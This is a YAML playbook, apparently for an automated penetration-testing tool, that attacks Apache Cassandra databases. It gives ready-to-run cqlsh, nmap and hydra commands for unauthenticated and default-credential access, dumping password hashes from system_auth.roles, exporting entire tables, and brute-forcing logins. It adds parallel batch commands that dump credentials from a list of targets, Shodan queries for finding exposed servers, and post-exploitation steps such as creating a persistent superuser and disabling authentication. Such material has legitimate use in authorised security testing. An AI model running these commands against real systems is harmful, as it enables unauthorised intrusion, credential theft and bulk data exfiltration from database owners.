id: cassandra_pentesting
name: Cassandra Penetration Testing (Ports 9042, 9160)
description: Comprehensive Apache Cassandra enumeration, keyspace dumping, and credential extraction based on HackTricks methodology
category: enumeration
risk_level: high
batch_compatible: true

triggers:
  - id: trigger_cassandra_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: { "$in": [9042, 9160, 7000, 7001] }
      protocol: { "$in": ["cassandra", "cassandra-native", "tcp"] }
    required_count: 1
    priority: 6
    description: Triggers when Cassandra service is discovered
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: cassandra_enumeration
    name: Cassandra Service Enumeration
    description: Banner grabbing and version detection
    order: 1
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV -p {port} --script cassandra-info {host}"
        preferred: true
        notes: "Cassandra version and cluster info enumeration"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT cluster_name, release_version FROM system.local;'"
        preferred: false
        notes: "Connect and extract cluster/version info"
        requires_elevation: false

  - id: cassandra_auth_check
    name: Cassandra Authentication Check
    description: Test if authentication is required
    order: 2
    timeout_seconds: 60
    commands:
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port}"
        preferred: true
        notes: "Test unauthenticated access (default in many configs)"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -u cassandra -p cassandra"
        preferred: false
        notes: "Test default credentials (cassandra:cassandra)"
        requires_elevation: false

  - id: cassandra_cluster_info
    name: Cassandra Cluster Information Enumeration
    description: Extract cluster configuration and node information
    order: 3
    timeout_seconds: 120
    commands:
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT cluster_name, thrift_version, data_center, partitioner, native_protocol_version, rack, release_version FROM system.local;'"
        preferred: true
        notes: "Get comprehensive cluster information"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT * FROM system.peers;'"
        preferred: false
        notes: "Enumerate other nodes in the cluster"
        requires_elevation: false

  - id: cassandra_keyspace_enumeration
    name: Cassandra Keyspace Enumeration
    description: List all keyspaces (databases) in Cassandra
    order: 4
    timeout_seconds: 120
    commands:
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT keyspace_name FROM system.schema_keyspaces;'"
        preferred: true
        notes: "List all keyspaces (databases)"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'DESCRIBE KEYSPACES;'"
        preferred: false
        notes: "Describe all keyspaces"
        requires_elevation: false

  - id: cassandra_table_enumeration
    name: Cassandra Table/Column Family Enumeration
    description: List tables and columns within keyspaces
    order: 5
    timeout_seconds: 180
    commands:
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'DESCRIBE KEYSPACE {keyspace};'"
        preferred: true
        notes: "Describe all tables in a specific keyspace"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT * FROM system_schema.tables WHERE keyspace_name = \\'{keyspace}\\';'"
        preferred: false
        notes: "List tables programmatically"
        requires_elevation: false

  - id: cassandra_credential_extraction
    name: Cassandra Credential Extraction
    description: Extract user credentials and roles
    order: 6
    timeout_seconds: 180
    commands:
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT * FROM system_auth.roles;'"
        preferred: true
        notes: "Extract user roles (contains password hashes)"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT * FROM system_auth.role_permissions;'"
        preferred: true
        notes: "Extract role permissions"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'DESCRIBE TABLE system_auth.roles;'"
        preferred: false
        notes: "Describe roles table structure"
        requires_elevation: false

  - id: cassandra_data_extraction
    name: Cassandra Data Extraction
    description: Dump data from tables
    order: 7
    timeout_seconds: 600
    commands:
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT * FROM {keyspace}.{table};' > {keyspace}_{table}_dump.txt"
        preferred: true
        notes: "Dump all data from a specific table"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'COPY {keyspace}.{table} TO \\'{table}.csv\\' WITH HEADER=true;'"
        preferred: true
        notes: "Export table data to CSV file"
        requires_elevation: false

  - id: cassandra_sensitive_data_search
    name: Cassandra Sensitive Data Search
    description: Search for credentials and sensitive information
    order: 8
    timeout_seconds: 300
    commands:
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT * FROM logdb.user_auth;'"
        preferred: true
        notes: "Common table for user authentication data"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT * FROM logdb.user;'"
        preferred: true
        notes: "Common table for user information"
        requires_elevation: false
      - tool: cqlsh
        platforms: [linux, macos, windows]
        command: "cqlsh {host} {port} -e 'SELECT * FROM configuration.\"config\";'"
        preferred: false
        notes: "Common configuration table (may contain secrets)"
        requires_elevation: false

  - id: cassandra_brute_force
    name: Cassandra Authentication Brute Force
    description: Brute force Cassandra credentials
    order: 9
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L users.txt -P passwords.txt cassandra://{host}:{port}"
        preferred: true
        notes: "Cassandra credential brute forcing"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p {port} --script cassandra-brute --script-args userdb=users.txt,passdb=passwords.txt {host}"
        preferred: false
        notes: "Nmap Cassandra brute force"
        requires_elevation: false

metadata:
  tools:
    - cqlsh
    - nmap
    - hydra
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/cassandra
    - https://cassandra.apache.org/doc/latest/
  techniques:
    - Unauthenticated access exploitation
    - Cluster enumeration
    - Keyspace and table discovery
    - Credential hash extraction
    - Data exfiltration (CSV/text dumps)
    - Default credential testing
    - Authentication brute forcing
    - Sensitive data search
  batch_commands:
    enum_clusters: "parallel -j 10 'cqlsh {} -e \"SELECT cluster_name, release_version FROM system.local;\"' :::: {targets_file}"
    dump_credentials: "parallel -j 5 'cqlsh {} -e \"SELECT * FROM system_auth.roles;\" > credentials_{}.txt' :::: {targets_file}"
  notes: |
    Apache Cassandra is a NoSQL distributed database designed for high availability.

    DEFAULT CONFIGURATION:
    - Default port 9042 (CQL native transport, preferred)
    - Legacy port 9160 (Thrift RPC, deprecated)
    - Port 7000 (inter-node communication)
    - Port 7001 (TLS inter-node communication)

    AUTHENTICATION:
    - Authentication often disabled in development/test environments
    - Default credentials: cassandra:cassandra
    - PasswordAuthenticator vs AllowAllAuthenticator
    - Credentials stored in system_auth.roles with bcrypt hashes

    COMMON MISCONFIGURATIONS:
    - No authentication required (AllowAllAuthenticator)
    - Default cassandra:cassandra credentials unchanged
    - Exposed to internet on 0.0.0.0
    - Weak or no inter-node encryption

    KEYSPACE STRUCTURE:
    - Keyspaces are like databases in SQL
    - Tables (column families) contain rows with columns
    - System keyspaces: system, system_auth, system_schema, system_traces
    - Application keyspaces contain business data

    CREDENTIAL EXTRACTION:
    - system_auth.roles table contains user credentials
    - Passwords hashed with bcrypt (salted, difficult to crack)
    - Even with hashes, can create new superuser if write access

    SENSITIVE KEYSPACES/TABLES:
    - system_auth.roles - User credentials and hashes
    - logdb.user_auth - Common app table for auth
    - logdb.user - Common app table for user info
    - configuration.config - Config settings (may have secrets)
    - Any keyspace with "user", "auth", "credential", "config" in name

    CQL QUERY LANGUAGE:
    - Similar to SQL but with NoSQL concepts
    - SELECT * FROM keyspace.table;
    - DESCRIBE KEYSPACE name;
    - COPY table TO 'file.csv' WITH HEADER=true;
    - No JOIN operations (denormalized data model)

    SHODAN QUERIES:
    - port:9160 Cluster
    - port:9042 "Invalid or unsupported protocol version"

    DATA EXPORT OPTIONS:
    1. cqlsh COPY TO CSV (best for structured export)
    2. SELECT * and redirect to text file
    3. nodetool snapshot + sstable2json (if file system access)

    POST-EXPLOITATION:
    - Create superuser account for persistence
    - Extract all keyspace data
    - Look for PII, credentials, API keys
    - Monitor queries via system_traces keyspace
    - Disable authentication if config file access

    HASH CRACKING:
    - Cassandra uses bcrypt with salt (slow to crack)
    - Extract from system_auth.roles: salted_hash column
    - Use john or hashcat with bcrypt mode
    - Better to create new superuser than crack existing
